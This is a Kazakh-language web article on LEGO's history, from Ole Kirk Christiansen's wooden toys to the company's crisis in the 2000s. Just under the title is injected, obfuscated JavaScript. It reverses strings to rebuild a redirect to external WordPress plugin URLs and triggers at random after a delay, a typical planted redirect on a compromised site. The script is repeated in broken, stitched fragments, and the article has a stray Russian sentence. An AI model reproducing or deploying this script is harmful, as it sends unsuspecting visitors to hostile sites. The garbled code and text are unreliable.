2024-07-27

LEGO-ның тарихы, немесе ойыншықтар әлеміндегі ең танымал бренд қалай пайда болды

$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/1images.jpg» style=»margin: 5px; float: left;» alt=»1images» src=»images/stoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/1images.jpg» height=»131″ width=»156″ />LEGO балаларға арналған ойыншықтар әлемінде танымалдық жағынан бүгінгінің баласының айнымас досына айналған Barbie қуыршағы мен Hasbro-ны да шаң қаптырады. Оның тарихы қалай басталып еді, бұл туралы сатып алушының да , сатушының да ойлана бермейтіні рас. Өткен жылдар қойнауында қалған сол тарихты ақтара келсек,  бай болудың тағы бір құпиясын ашамыз. Кімнің бай болғысы келмейді дейсіз…
Сонымен ойыншықты алғаш ойлап тапқан дат компаниясы алғашында  ағаш бұйымдарын шығарумен айналысқан. Сондықтан да алғашқы LEGO ойыншықтары тек қана ағаштан жасалған.
Бірақ компанияның  бұйымдарына сұраныстың көбейгені сонша, басқа пират-фирмалар олардың конструкцияларын қоарп-қорабымен «көшіріп» шығара бастады. Сет Годин айтқан мынадай сөз бар: «Егер сізді көшіріп жатса, онда сіздің шынында керемет бір нәрсе ойлап тапқаныңыз».

Балалық шақ… ағаш ойыншықтар
 LEGO-ның тарихы 1932 жылдан басталады. Оле Кирк Кристиансен осы жылы Данияда күнделікті тұрмысқа қажет  тауарлар шығаратын өндіріс орнын ашады. Ол бұйымдардың бәрін ағаштан жасайды. Үтіктеу тақталары, баспалдақтар бастапқыда айтарлықтай пайда әкелгенімен әлемдік қаржы дағдарысы жылдары  сұраныс бірден төмендейді.
Не істеу керек? Оленің назарын  балаларға арналған ағаш ойыншықтар аударады.  Дағдарысқа қарамастан оларға деген сұраныс  азаймаған. Оған көмекке 12 жылдан бері жанында жүрген баласы келеді.
Ойыншық өндіруге кіріскеннен кейін Кристиансен компанияның атауын ойластыра бастайды. Зауыттың барлық жұмысшыларына өз ұсыныстарын айтуды тапсырады. Әрине, ұсыныс көп болды, қорытындыда   LEGO деген атау дұырс деп табылды. бұл– Leg және Godt сөздерінің  қосындысы еді, (аудармасы «жақсы ойнау » дегенді білдіреді), ұсынған зауыт қожайыны болды. Кейінірек олар латын тілінде«LEGO» деген сөз барын ол «мен үйренемін» немесе «мен қалаймын» дегенге келетінін білді. Әрине, мұндай сәйкестік компанияның болашғына айтарлықтай әсерін тигізді.  
Бұл кезде компанияда бар болғаны өз кәсібіне берілген, әр жаңа бұйым жасап шығарған сайын балаша қуанатын 7 ұста  жұмыс істейтін. Олар өнімнің сапасына  сол кездің өзінде қатты көңіл бөлетін.
1936 жылы компанияда ойыншықтың  42 атауы болды. Және оларды сатып алуға кез-келгеннің қолы жете бермейтін. уже имела в своем распоряжении набор из 42 различных игрушек. (қазірде LEGO арзан заттардың қатарына жатпайды).
40-шы жылдары компания  тарихында көптеген өзгерістер орын алды. Ең ауыры   жалғыз фабрика жанып кетті. Енді тек қана LEGO ойыншықтарын шығарудан басқа амал қалмады.  1943 жылы фабрикада 40 адам жұмыс істеді, бір жылдан кейін Кристиансендер компанияны ресми тіркеуден өткізіп, оған«LegetOjsfabrikken LEGO Billund A/S» деген атау берді.
Үш жылдан кейін компания тарихында елеулі оқиға орын алды. LEGO  ағылшын  психологі Mr. Hilary Harry Fisher Page’а-дің өнімін шығару құқын алады. Бұл басқа осыған ұқсас заттармен біріктіріп құрастыратын  аса үлкен емес кубиктер болатын. Біріктіру құралдары бекем болмағандықтан  олар  тез шашылып, тез жиналатын. Бұл Оле Готфридтің 30 жасқа толған кезі еді,ол  енді  әкесімен бірдей жұмыс істей бастады, және ойыншықтардың болашағының зор екенін түсінді.
Енді LEGO шикізат ретінде тек ағашты емес, пластмассаны қолдана бастады. 40-шы жылдардың соңына қарай компания 200 түрлі ағаш және пластмасса ойыншықтарын шығарды.
1958 жылы  компанияның басшысы  Готфрид Кристиансен кубиктерден тұратын құрылыс элементтері жүйесіне патент алады.Бұл конструктордың тетіктерін  бекем байланыстыратын жаңа жүйе еді. Енді оны шын мәнінде конструктор деп атауға болатын еді.
Бұған дейін нақтыласақ 1955 жылы LEGO тақырыптық ойыншықтар шығаруды қолға  алды.Ол қазір біз көріп, балаларымызға сатып алып  беріп жүрген космос, қала сияқты конструкторлардың қарлығашы еді, сол кездің өзінде танымалдылығы орасан болды.
 LEGO брендінің жарқын болашағы
Бір қызығы аталған компанияның тарихында өрт оқиғалары жиі орын алған. 1960 жылы компанияның ағаш ойыншықтарын шығаратын цехы түгелдей жанып кетеді. Осыдан кейін басшылық өндірісті қайта жолға қоюды дұрыс деп таппайды да, пластмасса өндірісіне толықтай көшеді. Бұл кезде  LEGO-ның конструкторлары  әлемнің  50  тарта мемлекетінде сатылатын. Ал, 1962 жылы  LEGO жеке авиакомпания ашты. Конструкторларын АҚШ-қа шығара бастады.
Мұндай табысты нарыққа шығу, алдарына дүние жүзін өздері шығарған ойыншықтармен жаулап аламыз деген мақсат қойған  даттықтар үшін  өте маңызды оқиға болды. Қону және ұшыру алаңын ашқаннан кейін арада 2 жыл өткенде LEGO конструкторларына оны жинақтау жолдарын түсіндіретін қысқаша  нұсқамалықтарды ұсына бастады. Осыдан бастап  конструкторды жинақтау үлгісі көсретілген нұсқамалар  LEGO-ның ажырамас бір бөлігіне айналды. Енді компания   өкілдері  өнімнің сапасы мен  сатып алушыларға көбірек көңіл бөлуді жолға қойды.
 LEGO әлемдік өндіріс нарығындағы клиентке не керек  екеніне қызығушылық танытқан алғашқы  фирмалардың бірі еді. Бұрын өз бастамасы бойынша жұмыс істеген  компания енді клиенттердің пікіріне орай өнім шығарды. Өте сәтті жүзеге асқан темір жол конструкторлары жиынтығы осындай сұраныстан  туған алғашқы бұйым.
60-шы жылдардың ортасында компанияның негізгі фабрикасында 500-ден аса адам жұмыс істеді. Олар енді ойыншықтарды баланың жас ерекшелігіне қарай шығара бастады,1968 жылы Данияның Биллунд қаласында LEGOLAND паркін ашты, осы жылы Люксембургте жылдың үздік ойыншығы номинациясына ие болды. Бұл әлем балаларының жүрегін жаулаған компанияның аяғынан тұра бастаған жылдары еді.
Ойыншық түрлерін көбейтуге деген құлшыныс
Егер  LEGO тек ұл балаларға арналған ойыншықтар шығарды десек жаңылысамыз. Дупло   жобасы бойынша шыққан өнімдер қыздардың арасында да кең тарады, ал, 70-ші жылдары  жихазбен жабдықталған қуыршақ үйлер жиынтығы  тұтынушыларға жол тартты. Ал, қазіргі бүкіл планета білетін LEGO логотипі 1973 жылы жасалған,осыдан кейін  компанияның өндірісі  Даниядан басқа мемлекеттерде өркен жая бастады.  LEGO-ның шетелдегі алғашқы фабрикасы Швейцарияда ашылды.
 1977 жылы LEGO компаниясының басшылығына Оле Кристиансеннің немересі Кельд келді. Бұл кезде LEGO шығарған өнімдердің ішінен тұтынушы қалағанын табатындай жағдайда еді. Енді  жүретін ойыншық жиынтықтары өндіріске жіберілді.
LEGO шығарған өнім түрлері күн санап емес, сағат санап өсе бастады. Олар шын мәнінде қайталанбас дүниелер еді. Осыған дейін компания тұтынушыға жұмыс істесе, енді ол тұтынушының зор құрметіне бөлене бастады.1980 жылы тұтынушылар компанияға деген ризашылық сезімін ол шығарған өнімдерден 13,1 метрлік  мұнара салу арқылы білдірді. Мұндай құрметтер әр жылдары әлемнің түкпір-түкпірінде көрсетілді, 90-шы жылдары Мәскеуде 24,88 метрлік мұнара соғылып ол Гиннестің Рекордтар кітабына енді.
 LEGO-ның өнімдерін сату арқылы келіп жатқан табыс бас айналдырарлықтай еді. Соның ішінде 1984 «Замок» жиынтығынан түскен түсім күткендегіден асып түсті. Ортағасырлық тақырып бүгінгі ұрпақ үшін өзекті болып шықты. Енді компания мектеп оқушыларына арнап, оқыту мақсатында  роботтар шығара бастады. Күрделілігі мен бағасының қымбаттығына қарамастан бұл өнім де әлемде зор сұранысқа ие болды.
1986 жылы LEGO Дания королдығын ойыншықпен қамтитын дәрежеге жетті. Бұл құрметті атақ, жарнаманың ең үздігі еді.
1990 жылдары әлемде LEGO-ның  Atko, мұнан басқада  көптеген көшірмелері шыға бастады.Бірақ бұл ойыншықтардың түпнұсқадан  сапасы әлдеқайда төмен еді, бағасы да арзан болатын.
Бүгінде
Қазіргі таңда LEGO ұзаққа созылған дағдарыстан шығудың  жолдарын қарастыруда. «Тірі» ойыншықтарды компьютер ойындары алмастырып, компания бірқатар қиындықтарды бастан кешірді. Әсіресе, соңғы жылдары  қолға алынған ж LEGO парфюмерлік жиынтықтары ,киім  шығару шығару сияқты жобалар  тек қана шығын әкелді. 2003 жылы шығын 300 миллион долларды құрады.  Осындай өте тиімсіз өндірістердің салдарынан,  қаржы қайтарымсыз кетті. Ахуалды оңалту  үшін LEGO  Йоргена Виг Кнудсторпаны жұмысқа шақырды.
Ол бірінші кезекте өндірісті  өнімі арзан саналатын елдерге көшірді. Екіншіден  компанияның шығын әкелген  жобаларын бірден қысқартты. Йорген ендітұтынушылармен ғаламтор арқылы тілдесіп, жаңа идеяларды интернет арқылы іздестіре бастады.{jcomments on}

Яндекс.Метрика